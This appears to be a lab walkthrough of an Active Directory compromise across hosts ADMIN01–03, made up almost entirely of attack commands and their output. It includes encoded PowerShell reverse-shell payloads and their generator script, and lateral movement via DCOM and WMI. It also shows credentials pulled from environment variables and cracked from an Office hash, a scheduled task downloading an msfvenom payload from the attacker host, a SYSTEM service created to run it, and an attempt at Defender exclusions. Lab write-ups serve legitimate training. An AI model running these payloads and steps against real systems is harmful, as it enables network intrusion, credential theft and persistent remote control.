powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwACIALAA0ADQANAA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
13. Used DCOM to create an instance of the MMC20.Application COM object on ADMIN02, establishing a remote object for command execution.
PS C:\Users\francesca> $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1", "10.10.14.140"))14. Executed the base64-encoded PowerShell command on the remote system via the DCOM object’s shell command execution method.
PS C:\Users\francesca> $dcom.Document.ActiveView.ExecuteShellCommand("powershell", $null, "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwACIALAA0ADQANAA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==", "7")
1. Spawned a Reverse Shell on ADMIN03, as Francesca
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4449
listening on [any] 4449 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.140] 49740
whoami; hostname
ad\francesca
ADMIN03
2. Checked Shell Integrity Level
PS C:\WINDOWS\system32> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-122883. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.
PS C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.4. Enabled Remote Desktop in the Windows firewall
PS C:\WINDOWS\system32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Updated 3 rule(s).
Ok.5. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.
PS C:\WINDOWS\system32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow
Name : {2ae4f7fb-9fd8-4dee-bb52-e3cec491042c}
DisplayName : Open Port 3389
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId :
PackageFamilyName :6. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.
PS C:\WINDOWS\system32> netstat -ano | findstr 3389
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 8600
TCP [::]:3389 [::]:0 LISTENING 8600
UDP 0.0.0.0:3389 *:* 8600
UDP [::]:3389 *:*7. Initiated an RDP session to ADMIN03 using Francesca's Credentials
┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:francesca /p:bubbelinbunny_1 /v:10.10.14.140
[19:31:40:390] [83046:83047] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[19:31:40:390] [83046:83047] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[19:31:40:458] [83046:83047] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[19:31:40:458] [83046:83047] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[19:31:41:982] [83046:83047] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_BUMP_OPTIONS]8. Listed all environment variables for the current session. Found "SeventhPassword".
PS C:\Users\francesca> Get-ChildItem Env:
Name Value
---- -----
AdminPassword mc_monkey_1
ALLUSERSPROFILE C:\ProgramData
APPDATA C:\WINDOWS\system32\config\systemprofile\AppData\Roaming
CommonProgramFiles C:\Program Files\Common Files
CommonProgramFiles(x86) C:\Program Files (x86)\Common Files
CommonProgramW6432 C:\Program Files\Common Files
COMPUTERNAME ADMIN03
ComSpec C:\WINDOWS\system32\cmd.exe
DriverData C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA C:\WINDOWS\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS 2
OS Windows_NT
Path C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPo...
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER Intel64 Family 6 Model 183 Stepping 1, GenuineIntel
PROCESSOR_LEVEL 6
PROCESSOR_REVISION b701
ProgramData C:\ProgramData
ProgramFiles C:\Program Files
ProgramFiles(x86) C:\Program Files (x86)
ProgramW6432 C:\Program Files
PSExecutionPolicyPreference Bypass
PSModulePath WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\syste...
PUBLIC C:\Users\Public
SystemDrive C:
SystemRoot C:\WINDOWS
TEMP C:\WINDOWS\TEMP
TMP C:\WINDOWS\TEMP
USERDOMAIN AD
USERNAME ADMIN03$
USERPROFILE C:\WINDOWS\system32\config\systemprofile
windir C:\WINDOW9. Confirmed Authentication to the SMB service on ADMIN02 using the AdminPassword value.
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.14.160 -u 'gregory' -p 'mc_monkey_1'
SMB 10.10.14.160 445 ADMIN02 [*] Windows 10.0 Build 26100 x64 (name:ADMIN02) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB 10.10.14.160 445 ADMIN02 [+] AD.LAB\gregory:mc_monkey_110. Enumerated all available SMB shares on ADMIN02.
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.14.160 -u 'gregory' -p 'mc_monkey_1' --shares
SMB 10.10.14.160 445 ADMIN02 [*] Windows 10.0 Build 26100 x64 (name:ADMIN02) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB 10.10.14.160 445 ADMIN02 [+] AD.LAB\gregory:mc_monkey_1
SMB 10.10.14.160 445 ADMIN02 [*] Enumerated shares
SMB 10.10.14.160 445 ADMIN02 Share Permissions Remark
SMB 10.10.14.160 445 ADMIN02 ----- ----------- ------
SMB 10.10.14.160 445 ADMIN02 ADMIN$ Remote Admin
SMB 10.10.14.160 445 ADMIN02 AdminDocs READ
SMB 10.10.14.160 445 ADMIN02 C$ Default share
SMB 10.10.14.160 445 ADMIN02 IPC$ READ Remote IPC11. Opened an interactive SMB session on ADMIN02.
┌──(kali㉿kali)-[~]
└─$ impacket-smbclient ad.lab/gregory:'mc_monkey_1'@10.10.14.160
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands12. Listed the Available Shares on ADMIN02.
# shares
ADMIN$
AdminDocs
C$
IPC$13. Switched the current share context to the "AdminDocs" share.
# use AdminDocs14. Listed the contents of the current share.
# ls15. Downloaded "Instructions.docx" from the remote share
# get Instructions.docx16. Exited impacket-smbclient
# exit17. Extracted the Office document’s hash from "Instructions.docx" and saves it to "hash.txt" for cracking.
┌──(kali㉿kali)-[~]
└─$ /usr/share/john/office2john.py ~/Instructions.docx > hash.txt
18. Removed the "<filename>:" prefix at the beginning of the hash:
┌──(kali㉿kali)-[~]
└─$ vim hash.txt
$office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a1ade8de41*09b02be4a378f67420ea7f3c46d84f57*2bf86a5bee591bc7508b4718a11a62d6fb18746c4397fbb58cb9e9e6ebfefe1319. Used Hashcat on the protected Word Doc, revealing the password "abc123"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 9600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344388
* Bytes.....: 139921561
* Keyspace..: 14344388
$office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a1ade8de41*09b02be4a378f67420ea7f3c46d84f57*2bf86a5bee591bc7508b4718a11a62d6fb18746c4397fbb58cb9e9e6ebfefe13:abc123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*b0e0f372ce13ecb6bef3c7a...fefe13
Time.Started.....: Tue Feb 4 22:21:12 2025 (2 secs)
Time.Estimated...: Tue Feb 4 22:21:14 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 247 H/s (5.11ms) @ Accel:512 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344388 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SeventhPassword123 -> fuckyou1
Hardware.Mon.#1..: Util: 87%
Started: Tue Feb 4 22:20:58 2025
Stopped: Tue Feb 4 22:21:15 202520. Used the cracked password to access the Word Document, revealing Helen's password ("chase#1")
The Word Doc has this message:
Use these credentials to log into ADMIN02. Note that remote logins are not allowed and will not work. You can only connect to ADMIN02 if you’re physically in the office.
Helen
chase#121. Generated a base64 encoded payload for port 4450
┌──(kali㉿kali)-[~]
└─$ vim encode4450.py
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.10",4450);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
┌──(kali㉿kali)-[~]
└─$ python encode4450.py
powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwACIALAA0ADQANQAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
22. Enabled PowerShell remoting on the local machine, allowing it to execute commands on other computers (in Francesca's RDP session)
PS C:\Users\francesca> Enable-PSRemoting -Force
WinRM has been updated to receive requests.
WinRM service type changed successfully.
WinRM service started.
WinRM has been updated for remote management.
WinRM firewall exception enabled.23. Configured WinRM to trust the host (ADMIN02) for remote management.
PS C:\Users\francesca> Set-Item WSMan:\localhost\Client\TrustedHosts -Value 10.10.14.160 -Force24. Retrieved and display the current WinRM TrustedHosts setting.
PS C:\Users\francesca> Get-Item WSMan:\localhost\Client\TrustedHosts
WSManConfig: Microsoft.WSMan.Management\WSMan::localhost\Client
Type Name SourceOfValue Value
---- ---- ------------- -----
System.String TrustedHosts 10.10.14.16025. Created new CIM session options configured to use the WSMan protocol.
PS C:\Users\francesca> $sessionOpts = New-CimSessionOption -Protocol WSMan26. Generated a PSCredential object for the user "AD\helen" using the password found in the Word Document.
PS C:\Users\francesca> $cred = New-Object System.Management.Automation.PSCredential("AD\helen",(ConvertTo-SecureString "chase#1" -AsPlainText -Force))27. Established a new CIM session to ADMIN02 using WSMan options and the specified credentials.
PS C:\Users\francesca> $session = New-CimSession -ComputerName 10.10.14.160 -SessionOption $sessionOpts -Credential $cred28. Defined a PowerShell command that runs with no profile in a hidden window using a base64-encoded payload.
PS C:\Users\francesca> $command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwACIALAA0ADQANQAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='29. Executed the specified PowerShell command on the remote host by creating a new process via the established CIM session.
PS C:\Users\francesca> Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $command }
ProcessId ReturnValue PSComputerName
--------- ----------- --------------
412 0 10.10.14.1601. Spawned a Reverse Shell on ADMIN02, as Helen
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4450
listening on [any] 4450 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.160] 50130
whoami; hostname
ad\helen
ADMIN02
2. Confirmed Shell Integrity Level
PS C:\WINDOWS\system32> whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-122883. Modified the registry to enable Remote Desktop, by setting the fDenyTSConnections value to 0.
PS C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.4. Enabled Remote Desktop in the Windows firewall
PS C:\WINDOWS\system32> netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Updated 3 rule(s).
Ok.5. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.
PS C:\WINDOWS\system32> New-NetFirewallRule -DisplayName "Open Port 3389" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow
Name : {eb3987c9-20e7-4396-983e-2ae245234571}
DisplayName : Open Port 3389
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId :
PackageFamilyName :6. Listed active network connections filtered by port 3389 (RDP Service).
PS C:\WINDOWS\system32> netstat -ano | findstr 3389
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 8500
TCP [::]:3389 [::]:0 LISTENING 8500
UDP 0.0.0.0:3389 *:* 8500
UDP [::]:3389 *:* 85007. Initiated an RDP session to ADMIN03 using Helen's Credentials
┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:helen /p:'chase#1' /v:10.10.14.160
[20:35:17:349] [114225:114226] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[20:35:17:349] [114225:114226] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[20:35:17:386] [114225:114226] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[20:35:17:386] [114225:114226] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[20:35:18:865] [114225:114226] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_BUMP_OPTIONS]8. Created a Base64 Payload to Download a Reverse Shell Executable to ADMIN01
PS C:\Users\helen> $command = "curl http://10.10.14.10:8000/payload4451.exe -o C:\Users\Helen\payload4451.exe"
PS C:\Users\helen> $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
PS C:\Users\helen> $encodedCommand = [Convert]::ToBase64String($bytes)
PS C:\Users\helen> $encodedCommand
YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQANAA0ADUAMQAuAGUAeABlACAALQBvACAAQwA6AFwAVQBzAGUAcgBzAFwASABlAGwAZQBuAFwAcABhAHkAbABvAGEAZAA0ADQANQAxAC4AZQB4AGUA
9. Created a scheduled task on ADMIN01 system to run the encoded PowerShell command as SYSTEM at the specified time.
PS C:\Users\helen> schtasks /create /S ADMIN01 /sc once /tn "download_payload" /st 23:59 /sd 01/19/2030 /ru SYSTEM /tr "powershell.exe -ep Bypass -EncodedCommand YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQANAA0ADUAMQAuAGUAeABlACAALQBvACAAQwA6AFwAVQBzAGUAcgBzAFwASABlAGwAZQBuAFwAcABhAHkAbABvAGEAZAA0ADQANQAxAC4AZQB4AGUA" /f
SUCCESS: The scheduled task "download_payload" has successfully been created.10. Created a reverse shell binary
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4451 -f exe -o payload4451.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4451.exe
11. Confirmed the Python3 HTTP Server is Still Running
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...12. Triggered the execution of the scheduled task, downloading payload4451.exe on ADMIN01.
PS C:\Users\helen> schtasks /run /S ADMIN01 /TN "download_payload"
SUCCESS: Attempted to run the scheduled task "download_payload".
13. Created a new service named “MaliciousService” on ADMIN01 that will execute the downloaded payload on demand.
PS C:\Users\helen> sc.exe \\ADMIN01 create MaliciousService binPath= "C:\Users\Helen\payload4451.exe" type= own start= demand
[SC] CreateService SUCCESS14. Started “MaliciousService” service on ADMIN01 to trigger the reverse shell connection.
PS C:\Users\helen> sc.exe \\ADMIN01 start MaliciousService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
1. Spawned a Reverse Shell on ADMIN01 as SYSTEM
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4451
listening on [any] 4451 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.180] 49816
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> hostname
hostname
ADMIN01
C:\Windows\System32> whoami
whoami
nt authority\system
2. Displayed the content of “service.log”, which indicates that “NewService.dll” is missing.
C:\Windows\System32> type C:\NewService\service.log
NewService.dll is missing.3. Added a Windows Defender Exclusion for C:\NewService
C:\Windows\System32> powershell
powershell
Windows PowerShell
